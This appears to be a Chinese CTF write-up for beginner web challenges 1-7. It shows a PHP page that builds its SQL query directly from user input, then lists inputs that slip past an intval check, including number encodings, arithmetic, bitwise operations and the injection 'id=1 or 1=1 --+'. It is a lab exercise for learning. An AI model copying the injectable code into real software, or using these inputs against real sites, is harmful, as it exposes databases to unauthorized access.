萌新计划 PartⅠ

Part Ⅰ web1-7

题目总体代码框架如下，其中过滤内容不同，大体上通过构造出id=1000类似的语句进行绕过，得到flag

<?php
# 包含数据库连接文件
include("config.php");
# 判断get提交的参数id是否存在
if(isset($_GET['id'])){
    $id = $_GET['id'];
    # 判断条件,题目仅有此处不同
    if($STATEMENT){
        die("id error");
    }
    if(intval($id) > 999){
        # id 大于 999 直接退出并返回错误
        die("id error");
    }else{
        # id 小于 999 拼接sql语句
        $sql = "select * from article where id = $id order by id limit 1 ";
        echo "执行的sql为：$sql<br>";
        # 执行sql 语句
        $result = $conn->query($sql);
        # 判断有没有查询结果
        if ($result->num_rows > 0) {
            # 如果有结果，获取结果对象的值$row
            while($row = $result->fetch_assoc()) {
                echo "id: " . $row["id"]. " - title: " . $row["title"]. " <br><hr>" . $row["content"]. "<br>";
            }
        }
        # 关闭数据库连接
        $conn->close();
    }

}else{
    highlight_file(__FILE__);
}

?>
<!-- flag in id = 1000 -->

0x01：进制转换

1.二进制 0b1111101000
2.十六进制 0x3e8

0x02：字节操作

1.两次取反 ~~1000
2.异或 200^800
3,按位与 992|8

0x03：运算符

1.乘法 200*5
2.除法 10/0.01
3.减法 200--80
4.负负 --1000
5.加法 200+800（地址栏输入的话把+换成%2b）
6.整除 100 div 0.1

0x04：sql注入构造

id=1 or 1=1 --+

0x05：函数绕过

intval($id)会从字符串$id的起始位置开始去数字碰到非数字就结束,当起始位置为非数字时则为0。

intval(‘100a123’)=100
intval(‘a123’)=0

所以我们只要任意非数字开头就可以了

1.(1000)
2.'1000'